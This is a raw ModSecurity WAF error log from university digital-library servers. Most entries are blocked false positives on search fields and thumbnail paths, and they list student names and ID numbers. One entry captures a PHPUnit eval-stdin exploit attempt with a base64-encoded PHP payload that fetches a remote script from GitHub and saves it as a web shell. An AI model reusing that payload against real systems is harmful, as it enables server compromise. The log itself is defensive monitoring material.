[Tue Aug 29 10:54:59.299702 2023] [:error] [pid 65192] [client 185.246.211.205] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.122.213.174_ae075c864445525375efcdd76dab0b247e0ee304"): Internal error [hostname "digilibfisip.unla.ac.id"] [uri "/repository/free-bobux_GM431946152.pdf"] [unique_id "ZO1sE8Co-f0AAP6og30AAAAQ"]
[Tue Aug 29 13:10:55.291482 2023] [:error] [pid 4343] [client 115.178.237.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/An_Introduction_to_Politics,_State_Society_cover_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfisip.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZO2L78Co-f0AABD3pv0AAAAU"]
[Tue Aug 29 15:47:16.539344 2023] [:error] [pid 7980] [client 47.128.23.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22TIM REDAKSI LP3ESTIM REDAKSI LP3ES\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2wlMCo-f0AAB8szfYAAAAI"]
[Mon Aug 28 20:12:37.302348 2023] [:error] [pid 51507] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digiliblpm.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydRcCo-f0AAMkzQ6sAAAAL"]
[Mon Aug 28 07:00:45.613932 2023] [:error] [pid 37418] [client 36.69.196.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/Cover_Perancangan_Jaringan.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOvjrcCo-f0AAJIqO9gAAAAT"]
[Mon Aug 28 07:01:45.604144 2023] [:error] [pid 37312] [client 36.69.196.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/cover_Implementasi_algoritma.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOvj6cCo-f0AAJHAkvwAAAAY"]
[Mon Aug 28 07:02:52.452183 2023] [:error] [pid 37539] [client 36.69.196.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/cover_Analisis_dan_rancangan.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOvkLMCo-f0AAJKjZQYAAAAG"]
[Mon Aug 28 09:44:36.265586 2023] [:error] [pid 39570] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hamdani. A\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwKFMCo-f0AAJqS03cAAAAP"]
[Mon Aug 28 09:45:21.322870 2023] [:error] [pid 39716] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Bernandus Futwembun  L21090030\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwKQcCo-f0AAJskbxAAAAAG"]
[Mon Aug 28 09:59:02.209414 2023] [:error] [pid 39919] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Hukum Internasional\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwNdsCo-f0AAJvv1goAAAAR"]
[Mon Aug 28 10:14:28.761217 2023] [:error] [pid 40253] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Andriansyah L230130006\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwRFMCo-f0AAJ09tasAAAAR"]
[Mon Aug 28 12:06:38.589757 2023] [:error] [pid 42079] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Winston Karunna L210200007\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrXsCo-f0AAKRfAuIAAAAS"]
[Mon Aug 28 12:07:30.939450 2023] [:error] [pid 41960] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Basalamah, Salim\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrksCo-f0AAKPoNr0AAAAL"]
[Mon Aug 28 12:18:00.460836 2023] [:error] [pid 42259] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Kurniati, Yeti\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwuCMCo-f0AAKUTJu0AAAAI"]
[Mon Aug 28 12:24:10.647126 2023] [:error] [pid 42420] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Munzil, Fontian\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwvesCo-f0AAKW0Z8kAAAAY"]
[Mon Aug 28 12:50:17.314964 2023] [:error] [pid 43064] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Siti Nur L250150024\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw1mcCo-f0AAKg4FeUAAAAN"]
[Mon Aug 28 13:18:36.503183 2023] [:error] [pid 43587] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Insan Wibawa\\x09L210190024\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw8PMCo-f0AAKpDhoIAAAAI"]
[Mon Aug 28 13:25:42.903492 2023] [:error] [pid 43660] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ahmaddien, Iskandar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw95sCo-f0AAKqMxUMAAAAS"]
[Mon Aug 28 13:44:30.899719 2023] [:error] [pid 44267] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Aswin Daulay L230100061\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxCTsCo-f0AAKzrPFoAAAAE"]
[Mon Aug 28 13:55:30.092548 2023] [:error] [pid 44483] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Anita Yurnalia L230100048\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxE4sCo-f0AAK3DgmYAAAAJ"]
[Mon Aug 28 14:37:30.889196 2023] [:error] [pid 45134] [client 43.248.213.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/cover_Audit_Keamanan_Sistem.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxOusCo-f0AALBOfPUAAAAO"]
[Mon Aug 28 14:37:30.938063 2023] [:error] [pid 45135] [client 43.248.213.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/Cover_Penegakan_hukum_oleh_POLRI.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxOusCo-f0AALBPB50AAAAQ"]
[Mon Aug 28 14:37:30.951434 2023] [:error] [pid 45134] [client 43.248.213.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/financial_management.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxOusCo-f0AALBOfPgAAAAO"]
[Mon Aug 28 14:37:54.147707 2023] [:error] [pid 45055] [client 43.248.213.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/cover_Audit_Keamanan_Sistem.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibpasca.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxO0sCo-f0AAK--EnkAAAAI"]
[Mon Aug 28 15:13:32.513433 2023] [:error] [pid 45837] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Puspa, Yan Pramadya\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxXLMCo-f0AALMN81oAAAAP"]
[Mon Aug 28 18:26:11.204642 2023] [:error] [pid 49488] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Said Anna Fauza\\x09L220180018\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyEU8Co-f0AAMFQ8BcAAAAA"]
[Mon Aug 28 18:28:05.704760 2023] [:error] [pid 49490] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Witoyo L210120020\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyExcCo-f0AAMFSEIgAAAAD"]
[Mon Aug 28 18:41:35.354778 2023] [:error] [pid 49804] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Neli Yuliawati\\x09L235200027\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyH78Co-f0AAMKMr6YAAAAP"]
[Mon Aug 28 19:05:08.303680 2023] [:error] [pid 50144] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Arief, Barda Nawawi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyNdMCo-f0AAMPgPywAAAAH"]
[Mon Aug 28 19:19:10.023327 2023] [:error] [pid 50516] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kedokteran - Undang-Undang dan Peraturan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyQvsCo-f0AAMVUbdcAAAAa"]
